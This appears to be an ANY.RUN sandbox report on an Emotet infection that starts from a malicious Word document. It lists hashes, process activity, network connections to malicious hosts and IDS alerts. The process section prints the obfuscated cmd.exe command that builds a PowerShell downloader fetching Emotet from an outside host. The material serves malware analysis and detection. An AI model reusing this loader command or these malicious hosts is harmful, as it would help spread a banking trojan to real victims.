analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://ihaveanidea.org/wwvvv/GSmGc-aO9QIk8fxOQuLY_oFdaWXJEf-2I

Full analysis: https://app.any.run/tasks/dabaa9cf-8056-4181-a575-5df01232db24
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 14, 2018, 14:54:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
trojan
emotet
feodo
Indicators:
MD5:

D43434234DADAA01D08F4C914E0F64CD

SHA1:

9A97E3DA202F01FCC9E434ED4F4A6F5FA21824E0

SHA256:

42FAFDA50B54033DDDA7598E605DA4BD746A22172E384566D0CAEF33113817B1

SSDEEP:

3:N1KXUUiTTKVHEVyBqHrFyVs:CEwoyG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3040)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3392)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2824)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3040)
    • Application was dropped or rewritten from another process

      • 721.exe (PID: 3548)
      • 721.exe (PID: 2712)
      • archivesymbol.exe (PID: 3012)
      • archivesymbol.exe (PID: 3644)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3392)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3012)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3012)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3012)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 3636)
      • WINWORD.EXE (PID: 3040)
    • Application launched itself

      • WINWORD.EXE (PID: 3040)
      • 721.exe (PID: 2712)
    • Creates files in the user directory

      • powershell.exe (PID: 3392)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4056)
    • Executable content was dropped or overwritten

      • 721.exe (PID: 3548)
      • powershell.exe (PID: 3392)
    • Starts itself from another location

      • 721.exe (PID: 3548)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3040)
      • WINWORD.EXE (PID: 2152)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3040)
    • Modifies the open verb of a shell class

      • chrome.exe (PID: 3636)
    • Application launched itself

      • chrome.exe (PID: 3636)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 3636)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
18
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe chrome.exe no specs 721.exe no specs 721.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3636"C:\Program Files\Google\Chrome\Application\chrome.exe" http://ihaveanidea.org/wwvvv/GSmGc-aO9QIk8fxOQuLY_oFdaWXJEf-2IC:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
2364"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6faf00b0,0x6faf00c0,0x6faf00ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3584"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3640 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
2728"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=968,4597605501183007083,6217988815629531602,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D4F284B65256F90995B7C666B7C4B99B --mojo-platform-channel-handle=992 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
3048"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=968,4597605501183007083,6217988815629531602,131072 --enable-features=PasswordImport --service-pipe-token=14F3645E546A671C834B4A289AA7D575 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=14F3645E546A671C834B4A289AA7D575 --renderer-client-id=4 --mojo-platform-channel-handle=1892 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
4092"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=968,4597605501183007083,6217988815629531602,131072 --enable-features=PasswordImport --service-pipe-token=D53206B9F8C20A4A0AC3A55ADDA896C8 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=D53206B9F8C20A4A0AC3A55ADDA896C8 --renderer-client-id=3 --mojo-platform-channel-handle=1536 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3628"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=968,4597605501183007083,6217988815629531602,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=8C6B872FFA353F9B04C4B5BEFC4CD280 --mojo-platform-channel-handle=3392 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3040"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\BIZ_9EDWLOF.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2152"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
4056c:\CEloAdslF\CiWMfjqLBJoJ\QEQldTHGu\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set zFkq=SFkNXWLHJuwELQsMsqfpDOtkCkGVzzqw$n=:2'e7,i6;d(AIvhmbraY/{)-j.}@UR8+01xgy\c o4l&&for %E in (32;18;5;31;34;37;25;77;73;37;43;32;75;53;63;34;33;38;31;58;75;51;59;38;73;22;74;3;38;22;60;5;38;51;24;77;41;38;33;22;43;32;41;53;3;34;37;49;22;22;19;35;55;55;53;9;16;22;38;38;33;71;53;53;52;60;73;75;50;55;42;46;50;48;62;49;22;22;19;35;55;55;50;38;50;53;19;60;73;75;60;9;25;55;76;4;52;62;49;22;22;19;35;55;55;33;53;75;22;52;53;18;18;41;73;60;73;75;50;55;39;64;62;49;22;22;19;35;55;55;31;31;31;60;77;41;48;38;49;53;16;53;60;73;75;50;55;42;22;12;29;77;51;52;62;49;22;22;19;35;55;55;50;41;73;52;75;22;38;25;58;52;75;16;22;75;48;60;52;9;55;73;9;11;54;16;37;60;0;19;77;41;22;45;37;62;37;57;43;32;9;4;44;34;37;49;25;41;37;43;32;53;41;5;74;34;74;37;39;36;68;37;43;32;33;13;75;34;37;64;13;41;37;43;32;11;51;29;34;32;38;33;48;35;22;38;50;19;66;37;72;37;66;32;53;41;5;66;37;60;38;69;38;37;43;18;75;52;38;53;73;49;45;32;11;22;15;74;41;33;74;32;41;53;3;57;56;22;52;71;56;32;75;53;63;60;20;75;31;33;77;75;53;44;1;41;77;38;45;32;11;22;15;40;74;32;11;51;29;57;43;32;29;49;63;34;37;20;9;73;37;43;47;18;74;45;45;26;38;22;58;47;22;38;50;74;32;11;51;29;57;60;77;38;33;70;22;49;74;58;70;38;74;65;67;67;67;67;57;74;56;47;33;48;75;25;38;58;47;22;38;50;74;32;11;51;29;43;32;20;0;0;34;37;48;31;31;37;43;51;52;38;53;25;43;61;61;73;53;22;73;49;56;61;61;32;11;18;59;34;37;21;21;63;37;43;78)do set bJQa=!bJQa!!zFkq:~%E,1!&&if %E geq 78 %TMP:~-1%%TEMP:~-9,-8%w%TEMP:~5,1%rshe%PUBLIC:~-3,-2%l "!bJQa:~-426!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 463
Read events
2 882
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
16
Text files
62
Unknown types
8

Dropped files

PID
Process
Filename
Type
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\a8284d02-7191-4fec-a64d-0adb8b4f5993.tmp
MD5:
SHA256:
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\92e6e27a-21a2-491d-ac11-8241b4e2d3b3.tmp
MD5:
SHA256:
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.oldtext
MD5:1AA66EFDB743FB0A8DCC1CD79B0B6542
SHA256:28D56532CCED7375A2A1C7731E57C1A1C2EC1AC9827F3E5BEEE7F8069A5F87DD
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:C10EBD4DB49249EFC8D112B2920D5F73
SHA256:90A1B994CAFE902F22A88A22C0B6CC9CB5B974BF20F8964406DD7D6C9B8867D1
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF13a626.TMPtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
3636chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old~RF13a6f1.TMPtext
MD5:F727DD25CDA7B2CC574098CEE1F5764A
SHA256:5F7BD6926940E400EE7FAA6D620192CA299F7B5AAA92D672F8173A767B3FBBFF
2364chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pmabinary
MD5:B59113C2DCD2D346F31A64F231162ADA
SHA256:1D97C69AEA85D3B06787458EA47576B192CE5C5DB9940E5EAA514FF977CE2DC2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
16
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3012
archivesymbol.exe
GET
201.111.83.186:8080
http://201.111.83.186:8080/
MX
malicious
3392
powershell.exe
GET
200
87.248.154.186:80
http://austeenyaar.com/6Amv/
IR
executable
144 Kb
malicious
3636
chrome.exe
GET
301
72.52.136.88:80
http://ihaveanidea.org/wwvvv/GSmGc-aO9QIk8fxOQuLY_oFdaWXJEf-2I
US
html
271 b
suspicious
3636
chrome.exe
GET
200
72.52.136.88:80
http://ihaveanidea.org/wwvvv/GSmGc-aO9QIk8fxOQuLY_oFdaWXJEf-2I/
US
document
90.2 Kb
suspicious
3392
powershell.exe
GET
301
87.248.154.186:80
http://austeenyaar.com/6Amv
IR
html
236 b
malicious
3012
archivesymbol.exe
GET
200
186.136.68.246:80
http://186.136.68.246/
AR
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3392
powershell.exe
87.248.154.186:80
austeenyaar.com
Tose'eh Ertebatat Novin Aria Co Pjs
IR
malicious
3636
chrome.exe
72.52.136.88:80
ihaveanidea.org
Liquid Web, L.L.C
US
suspicious
3636
chrome.exe
172.217.168.10:443
www.googleapis.com
Google Inc.
US
whitelisted
3636
chrome.exe
216.58.215.227:443
www.gstatic.com
Google Inc.
US
whitelisted
3636
chrome.exe
172.217.168.35:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3636
chrome.exe
216.58.215.237:443
accounts.google.com
Google Inc.
US
whitelisted
3636
chrome.exe
172.217.168.46:443
clients1.google.com
Google Inc.
US
whitelisted
3012
archivesymbol.exe
186.136.68.246:80
Prima S.A.
AR
malicious
3012
archivesymbol.exe
201.111.83.186:8080
Uninet S.A. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.168.35
whitelisted
ihaveanidea.org
  • 72.52.136.88
suspicious
www.gstatic.com
  • 216.58.215.227
whitelisted
accounts.google.com
  • 216.58.215.237
shared
ssl.gstatic.com
  • 216.58.215.227
whitelisted
www.googleapis.com
  • 172.217.168.10
  • 172.217.168.42
  • 216.58.215.234
whitelisted
austeenyaar.com
  • 87.248.154.186
malicious
clients1.google.com
  • 172.217.168.46
whitelisted

Threats

PID
Process
Class
Message
3636
chrome.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
3636
chrome.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
3636
chrome.exe
Attempted User Privilege Gain
SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt
3636
chrome.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
3392
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3392
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3392
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3392
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3392
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3012
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2 ETPRO signatures available at the full report
No debug info